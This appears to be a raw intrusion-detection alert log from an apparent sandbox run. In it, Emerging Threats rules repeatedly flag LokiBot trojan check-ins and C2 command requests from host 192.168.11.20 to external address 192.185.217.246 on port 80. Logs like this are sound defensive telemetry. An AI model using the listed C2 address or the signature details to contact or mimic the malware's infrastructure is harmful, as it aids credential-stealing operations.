                                11/22/21-15:29:39.121938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.11.20192.185.217.246
                                11/22/21-15:29:39.121938TCP2025381ET TROJAN LokiBot Checkin4982180192.168.11.20192.185.217.246
                                11/22/21-15:29:39.121938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982180192.168.11.20192.185.217.246
                                11/22/21-15:29:39.980678TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.11.20192.185.217.246
                                11/22/21-15:29:39.980678TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.11.20192.185.217.246
                                11/22/21-15:29:39.980678TCP2025381ET TROJAN LokiBot Checkin4982280192.168.11.20192.185.217.246
                                11/22/21-15:29:39.980678TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.11.20192.185.217.246
                                11/22/21-15:29:40.829111TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.11.20192.185.217.246
                                11/22/21-15:29:40.829111TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.11.20192.185.217.246
                                11/22/21-15:29:40.829111TCP2025381ET TROJAN LokiBot Checkin4982380192.168.11.20192.185.217.246
                                11/22/21-15:29:40.829111TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.11.20192.185.217.246
                                11/22/21-15:29:41.656854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.11.20192.185.217.246
                                11/22/21-15:29:41.656854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.11.20192.185.217.246
                                11/22/21-15:29:41.656854TCP2025381ET TROJAN LokiBot Checkin4982480192.168.11.20192.185.217.246
                                11/22/21-15:29:41.656854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.11.20192.185.217.246
                                11/22/21-15:29:42.447762TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.11.20192.185.217.246
                                11/22/21-15:29:42.447762TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.11.20192.185.217.246
                                11/22/21-15:29:42.447762TCP2025381ET TROJAN LokiBot Checkin4982580192.168.11.20192.185.217.246
                                11/22/21-15:29:42.447762TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.11.20192.185.217.246
                                11/22/21-15:29:43.155024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.11.20192.185.217.246
                                11/22/21-15:29:43.155024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.11.20192.185.217.246
                                11/22/21-15:29:43.155024TCP2025381ET TROJAN LokiBot Checkin4982680192.168.11.20192.185.217.246
                                11/22/21-15:29:43.155024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.11.20192.185.217.246
                                11/22/21-15:29:43.984467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.11.20192.185.217.246
                                11/22/21-15:29:43.984467TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.11.20192.185.217.246
                                11/22/21-15:29:43.984467TCP2025381ET TROJAN LokiBot Checkin4982780192.168.11.20192.185.217.246
                                11/22/21-15:29:43.984467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982780192.168.11.20192.185.217.246
                                11/22/21-15:29:44.781908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.11.20192.185.217.246
                                11/22/21-15:29:44.781908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.11.20192.185.217.246
                                11/22/21-15:29:44.781908TCP2025381ET TROJAN LokiBot Checkin4982880192.168.11.20192.185.217.246
                                11/22/21-15:29:44.781908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.11.20192.185.217.246
                                11/22/21-15:29:45.550425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.11.20192.185.217.246
                                11/22/21-15:29:45.550425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.11.20192.185.217.246
                                11/22/21-15:29:45.550425TCP2025381ET TROJAN LokiBot Checkin4982980192.168.11.20192.185.217.246
                                11/22/21-15:29:45.550425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.11.20192.185.217.246
                                11/22/21-15:29:46.388342TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983080192.168.11.20192.185.217.246
                                11/22/21-15:29:46.388342TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983080192.168.11.20192.185.217.246
                                11/22/21-15:29:46.388342TCP2025381ET TROJAN LokiBot Checkin4983080192.168.11.20192.185.217.246
                                11/22/21-15:29:46.388342TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983080192.168.11.20192.185.217.246
                                11/22/21-15:29:47.208874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.11.20192.185.217.246
                                11/22/21-15:29:47.208874TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.11.20192.185.217.246
                                11/22/21-15:29:47.208874TCP2025381ET TROJAN LokiBot Checkin4983180192.168.11.20192.185.217.246
                                11/22/21-15:29:47.208874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983180192.168.11.20192.185.217.246
                                11/22/21-15:29:48.089770TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.11.20192.185.217.246
                                11/22/21-15:29:48.089770TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.11.20192.185.217.246
                                11/22/21-15:29:48.089770TCP2025381ET TROJAN LokiBot Checkin4983280192.168.11.20192.185.217.246
                                11/22/21-15:29:48.089770TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.11.20192.185.217.246
                                11/22/21-15:29:48.907541TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.11.20192.185.217.246
                                11/22/21-15:29:48.907541TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.11.20192.185.217.246
                                11/22/21-15:29:48.907541TCP2025381ET TROJAN LokiBot Checkin4983380192.168.11.20192.185.217.246
                                11/22/21-15:29:48.907541TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983380192.168.11.20192.185.217.246
                                11/22/21-15:29:49.746555TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983480192.168.11.20192.185.217.246
                                11/22/21-15:29:49.746555TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983480192.168.11.20192.185.217.246
                                11/22/21-15:29:49.746555TCP2025381ET TROJAN LokiBot Checkin4983480192.168.11.20192.185.217.246
                                11/22/21-15:29:49.746555TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.11.20192.185.217.246
                                11/22/21-15:29:50.586190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.11.20192.185.217.246
                                11/22/21-15:29:50.586190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.11.20192.185.217.246
                                11/22/21-15:29:50.586190TCP2025381ET TROJAN LokiBot Checkin4983580192.168.11.20192.185.217.246
                                11/22/21-15:29:50.586190TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983580192.168.11.20192.185.217.246
                                11/22/21-15:29:51.421233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.11.20192.185.217.246
                                11/22/21-15:29:51.421233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.11.20192.185.217.246
                                11/22/21-15:29:51.421233TCP2025381ET TROJAN LokiBot Checkin4983680192.168.11.20192.185.217.246
                                11/22/21-15:29:51.421233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983680192.168.11.20192.185.217.246
                                11/22/21-15:29:52.227112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.11.20192.185.217.246
                                11/22/21-15:29:52.227112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.11.20192.185.217.246
                                11/22/21-15:29:52.227112TCP2025381ET TROJAN LokiBot Checkin4983780192.168.11.20192.185.217.246
                                11/22/21-15:29:52.227112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983780192.168.11.20192.185.217.246
                                11/22/21-15:29:53.057144TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.11.20192.185.217.246
                                11/22/21-15:29:53.057144TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.11.20192.185.217.246
                                11/22/21-15:29:53.057144TCP2025381ET TROJAN LokiBot Checkin4983880192.168.11.20192.185.217.246
                                11/22/21-15:29:53.057144TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983880192.168.11.20192.185.217.246
                                11/22/21-15:29:53.809157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.11.20192.185.217.246
                                11/22/21-15:29:53.809157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.11.20192.185.217.246
                                11/22/21-15:29:53.809157TCP2025381ET TROJAN LokiBot Checkin4983980192.168.11.20192.185.217.246
                                11/22/21-15:29:53.809157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983980192.168.11.20192.185.217.246
                                11/22/21-15:29:54.636791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.11.20192.185.217.246
                                11/22/21-15:29:54.636791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.11.20192.185.217.246
                                11/22/21-15:29:54.636791TCP2025381ET TROJAN LokiBot Checkin4984080192.168.11.20192.185.217.246
                                11/22/21-15:29:54.636791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984080192.168.11.20192.185.217.246
                                11/22/21-15:29:55.476606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.11.20192.185.217.246
                                11/22/21-15:29:55.476606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.11.20192.185.217.246
                                11/22/21-15:29:55.476606TCP2025381ET TROJAN LokiBot Checkin4984180192.168.11.20192.185.217.246
                                11/22/21-15:29:55.476606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.11.20192.185.217.246
                                11/22/21-15:29:56.348589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.11.20192.185.217.246
                                11/22/21-15:29:56.348589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.11.20192.185.217.246
                                11/22/21-15:29:56.348589TCP2025381ET TROJAN LokiBot Checkin4984280192.168.11.20192.185.217.246
                                11/22/21-15:29:56.348589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984280192.168.11.20192.185.217.246
                                11/22/21-15:29:57.167977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.11.20192.185.217.246
                                11/22/21-15:29:57.167977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.11.20192.185.217.246
                                11/22/21-15:29:57.167977TCP2025381ET TROJAN LokiBot Checkin4984380192.168.11.20192.185.217.246
                                11/22/21-15:29:57.167977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984380192.168.11.20192.185.217.246
                                11/22/21-15:29:58.023260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.11.20192.185.217.246
                                11/22/21-15:29:58.023260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.11.20192.185.217.246
                                11/22/21-15:29:58.023260TCP2025381ET TROJAN LokiBot Checkin4984480192.168.11.20192.185.217.246
                                11/22/21-15:29:58.023260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.11.20192.185.217.246
                                11/22/21-15:29:58.864841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.11.20192.185.217.246
                                11/22/21-15:29:58.864841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.11.20192.185.217.246
                                11/22/21-15:29:58.864841TCP2025381ET TROJAN LokiBot Checkin4984580192.168.11.20192.185.217.246
                                11/22/21-15:29:58.864841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.11.20192.185.217.246
                                11/22/21-15:29:59.689049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.11.20192.185.217.246
                                11/22/21-15:29:59.689049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.11.20192.185.217.246
                                11/22/21-15:29:59.689049TCP2025381ET TROJAN LokiBot Checkin4984680192.168.11.20192.185.217.246
                                11/22/21-15:29:59.689049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.11.20192.185.217.246
                                11/22/21-15:30:00.511901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.11.20192.185.217.246
                                11/22/21-15:30:00.511901TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.11.20192.185.217.246
                                11/22/21-15:30:00.511901TCP2025381ET TROJAN LokiBot Checkin4984780192.168.11.20192.185.217.246
                                11/22/21-15:30:00.511901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.11.20192.185.217.246
                                11/22/21-15:30:01.346014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.11.20192.185.217.246
                                11/22/21-15:30:01.346014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.11.20192.185.217.246
                                11/22/21-15:30:01.346014TCP2025381ET TROJAN LokiBot Checkin4984880192.168.11.20192.185.217.246
                                11/22/21-15:30:01.346014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.11.20192.185.217.246
                                11/22/21-15:30:02.238846TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.11.20192.185.217.246
                                11/22/21-15:30:02.238846TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.11.20192.185.217.246
                                11/22/21-15:30:02.238846TCP2025381ET TROJAN LokiBot Checkin4984980192.168.11.20192.185.217.246
                                11/22/21-15:30:02.238846TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.11.20192.185.217.246
                                11/22/21-15:30:03.116561TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.11.20192.185.217.246
                                11/22/21-15:30:03.116561TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.11.20192.185.217.246
                                11/22/21-15:30:03.116561TCP2025381ET TROJAN LokiBot Checkin4985080192.168.11.20192.185.217.246
                                11/22/21-15:30:03.116561TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.11.20192.185.217.246
                                11/22/21-15:30:03.916596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.11.20192.185.217.246
                                11/22/21-15:30:03.916596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.11.20192.185.217.246
                                11/22/21-15:30:03.916596TCP2025381ET TROJAN LokiBot Checkin4985180192.168.11.20192.185.217.246
                                11/22/21-15:30:03.916596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.11.20192.185.217.246
                                11/22/21-15:30:04.808484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.11.20192.185.217.246
                                11/22/21-15:30:04.808484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.11.20192.185.217.246
                                11/22/21-15:30:04.808484TCP2025381ET TROJAN LokiBot Checkin4985280192.168.11.20192.185.217.246
                                11/22/21-15:30:04.808484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.11.20192.185.217.246
                                11/22/21-15:30:05.541894TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.11.20192.185.217.246
                                11/22/21-15:30:05.541894TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.11.20192.185.217.246
                                11/22/21-15:30:05.541894TCP2025381ET TROJAN LokiBot Checkin4985380192.168.11.20192.185.217.246
                                11/22/21-15:30:05.541894TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.11.20192.185.217.246
                                11/22/21-15:30:06.386046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.11.20192.185.217.246
                                11/22/21-15:30:06.386046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.11.20192.185.217.246
                                11/22/21-15:30:06.386046TCP2025381ET TROJAN LokiBot Checkin4985480192.168.11.20192.185.217.246
                                11/22/21-15:30:06.386046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.11.20192.185.217.246
                                11/22/21-15:30:07.236643TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.11.20192.185.217.246
                                11/22/21-15:30:07.236643TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.11.20192.185.217.246
                                11/22/21-15:30:07.236643TCP2025381ET TROJAN LokiBot Checkin4985580192.168.11.20192.185.217.246
                                11/22/21-15:30:07.236643TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.11.20192.185.217.246
                                11/22/21-15:30:08.022270TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.11.20192.185.217.246
                                11/22/21-15:30:08.022270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.11.20192.185.217.246
                                11/22/21-15:30:08.022270TCP2025381ET TROJAN LokiBot Checkin4985680192.168.11.20192.185.217.246
                                11/22/21-15:30:08.022270TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985680192.168.11.20192.185.217.246
                                11/22/21-15:30:08.881209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.11.20192.185.217.246
                                11/22/21-15:30:08.881209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.11.20192.185.217.246
                                11/22/21-15:30:08.881209TCP2025381ET TROJAN LokiBot Checkin4985780192.168.11.20192.185.217.246
                                11/22/21-15:30:08.881209TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.11.20192.185.217.246
                                11/22/21-15:30:09.697527TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.11.20192.185.217.246
                                11/22/21-15:30:09.697527TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.11.20192.185.217.246
                                11/22/21-15:30:09.697527TCP2025381ET TROJAN LokiBot Checkin4985880192.168.11.20192.185.217.246
                                11/22/21-15:30:09.697527TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985880192.168.11.20192.185.217.246
                                11/22/21-15:30:10.553688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.11.20192.185.217.246
                                11/22/21-15:30:10.553688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.11.20192.185.217.246
                                11/22/21-15:30:10.553688TCP2025381ET TROJAN LokiBot Checkin4985980192.168.11.20192.185.217.246
                                11/22/21-15:30:10.553688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985980192.168.11.20192.185.217.246
                                11/22/21-15:30:11.411926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.11.20192.185.217.246
                                11/22/21-15:30:11.411926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.11.20192.185.217.246
                                11/22/21-15:30:11.411926TCP2025381ET TROJAN LokiBot Checkin4986080192.168.11.20192.185.217.246
                                11/22/21-15:30:11.411926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986080192.168.11.20192.185.217.246
                                11/22/21-15:30:12.278911TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.11.20192.185.217.246
                                11/22/21-15:30:12.278911TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.11.20192.185.217.246
                                11/22/21-15:30:12.278911TCP2025381ET TROJAN LokiBot Checkin4986180192.168.11.20192.185.217.246
                                11/22/21-15:30:12.278911TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986180192.168.11.20192.185.217.246
                                11/22/21-15:30:13.115181TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.11.20192.185.217.246
                                11/22/21-15:30:13.115181TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.11.20192.185.217.246
                                11/22/21-15:30:13.115181TCP2025381ET TROJAN LokiBot Checkin4986280192.168.11.20192.185.217.246
                                11/22/21-15:30:13.115181TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986280192.168.11.20192.185.217.246
                                11/22/21-15:30:13.891909TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.11.20192.185.217.246
                                11/22/21-15:30:13.891909TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.11.20192.185.217.246
                                11/22/21-15:30:13.891909TCP2025381ET TROJAN LokiBot Checkin4986380192.168.11.20192.185.217.246
                                11/22/21-15:30:13.891909TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986380192.168.11.20192.185.217.246
                                11/22/21-15:30:14.675129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.11.20192.185.217.246
                                11/22/21-15:30:14.675129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.11.20192.185.217.246
                                11/22/21-15:30:14.675129TCP2025381ET TROJAN LokiBot Checkin4986480192.168.11.20192.185.217.246
                                11/22/21-15:30:14.675129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986480192.168.11.20192.185.217.246
                                11/22/21-15:30:15.505313TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.11.20192.185.217.246
                                11/22/21-15:30:15.505313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.11.20192.185.217.246
                                11/22/21-15:30:15.505313TCP2025381ET TROJAN LokiBot Checkin4986580192.168.11.20192.185.217.246
                                11/22/21-15:30:15.505313TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986580192.168.11.20192.185.217.246
                                11/22/21-15:30:16.320604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.11.20192.185.217.246
                                11/22/21-15:30:16.320604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.11.20192.185.217.246
                                11/22/21-15:30:16.320604TCP2025381ET TROJAN LokiBot Checkin4986680192.168.11.20192.185.217.246
                                11/22/21-15:30:16.320604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986680192.168.11.20192.185.217.246
                                11/22/21-15:30:17.188381TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.11.20192.185.217.246
                                11/22/21-15:30:17.188381TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.11.20192.185.217.246
                                11/22/21-15:30:17.188381TCP2025381ET TROJAN LokiBot Checkin4986780192.168.11.20192.185.217.246
                                11/22/21-15:30:17.188381TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.11.20192.185.217.246
                                11/22/21-15:30:18.036970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.11.20192.185.217.246
                                11/22/21-15:30:18.036970TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.11.20192.185.217.246
                                11/22/21-15:30:18.036970TCP2025381ET TROJAN LokiBot Checkin4986880192.168.11.20192.185.217.246
                                11/22/21-15:30:18.036970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986880192.168.11.20192.185.217.246
                                11/22/21-15:30:18.874562TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.11.20192.185.217.246
                                11/22/21-15:30:18.874562TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.11.20192.185.217.246
                                11/22/21-15:30:18.874562TCP2025381ET TROJAN LokiBot Checkin4986980192.168.11.20192.185.217.246
                                11/22/21-15:30:18.874562TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986980192.168.11.20192.185.217.246
                                11/22/21-15:30:19.675013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987080192.168.11.20192.185.217.246
                                11/22/21-15:30:19.675013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.11.20192.185.217.246
                                11/22/21-15:30:19.675013TCP2025381ET TROJAN LokiBot Checkin4987080192.168.11.20192.185.217.246
                                11/22/21-15:30:19.675013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987080192.168.11.20192.185.217.246
                                11/22/21-15:30:20.504684TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987180192.168.11.20192.185.217.246
                                11/22/21-15:30:20.504684TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987180192.168.11.20192.185.217.246
                                11/22/21-15:30:20.504684TCP2025381ET TROJAN LokiBot Checkin4987180192.168.11.20192.185.217.246
                                11/22/21-15:30:20.504684TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987180192.168.11.20192.185.217.246
                                11/22/21-15:30:21.320303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987280192.168.11.20192.185.217.246
                                11/22/21-15:30:21.320303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987280192.168.11.20192.185.217.246
                                11/22/21-15:30:21.320303TCP2025381ET TROJAN LokiBot Checkin4987280192.168.11.20192.185.217.246
                                11/22/21-15:30:21.320303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987280192.168.11.20192.185.217.246
                                11/22/21-15:30:22.077749TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987380192.168.11.20192.185.217.246
                                11/22/21-15:30:22.077749TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987380192.168.11.20192.185.217.246
                                11/22/21-15:30:22.077749TCP2025381ET TROJAN LokiBot Checkin4987380192.168.11.20192.185.217.246
                                11/22/21-15:30:22.077749TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987380192.168.11.20192.185.217.246
                                11/22/21-15:30:22.879171TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987480192.168.11.20192.185.217.246
                                11/22/21-15:30:22.879171TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987480192.168.11.20192.185.217.246
                                11/22/21-15:30:22.879171TCP2025381ET TROJAN LokiBot Checkin4987480192.168.11.20192.185.217.246
                                11/22/21-15:30:22.879171TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987480192.168.11.20192.185.217.246
                                11/22/21-15:30:23.703859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987580192.168.11.20192.185.217.246
                                11/22/21-15:30:23.703859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987580192.168.11.20192.185.217.246
                                11/22/21-15:30:23.703859TCP2025381ET TROJAN LokiBot Checkin4987580192.168.11.20192.185.217.246
                                11/22/21-15:30:23.703859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987580192.168.11.20192.185.217.246
                                11/22/21-15:30:24.540530TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987680192.168.11.20192.185.217.246
                                11/22/21-15:30:24.540530TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987680192.168.11.20192.185.217.246
                                11/22/21-15:30:24.540530TCP2025381ET TROJAN LokiBot Checkin4987680192.168.11.20192.185.217.246
                                11/22/21-15:30:24.540530TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987680192.168.11.20192.185.217.246
                                11/22/21-15:30:25.265839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987780192.168.11.20192.185.217.246
                                11/22/21-15:30:25.265839TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987780192.168.11.20192.185.217.246
                                11/22/21-15:30:25.265839TCP2025381ET TROJAN LokiBot Checkin4987780192.168.11.20192.185.217.246
                                11/22/21-15:30:25.265839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987780192.168.11.20192.185.217.246
                                11/22/21-15:30:26.262694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987880192.168.11.20192.185.217.246
                                11/22/21-15:30:26.262694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.11.20192.185.217.246
                                11/22/21-15:30:26.262694TCP2025381ET TROJAN LokiBot Checkin4987880192.168.11.20192.185.217.246
                                11/22/21-15:30:26.262694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987880192.168.11.20192.185.217.246
                                11/22/21-15:30:27.112182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14987980192.168.11.20192.185.217.246
                                11/22/21-15:30:27.112182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.11.20192.185.217.246
                                11/22/21-15:30:27.112182TCP2025381ET TROJAN LokiBot Checkin4987980192.168.11.20192.185.217.246
                                11/22/21-15:30:27.112182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24987980192.168.11.20192.185.217.246
                                11/22/21-15:30:27.944697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988080192.168.11.20192.185.217.246
                                11/22/21-15:30:27.944697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.11.20192.185.217.246
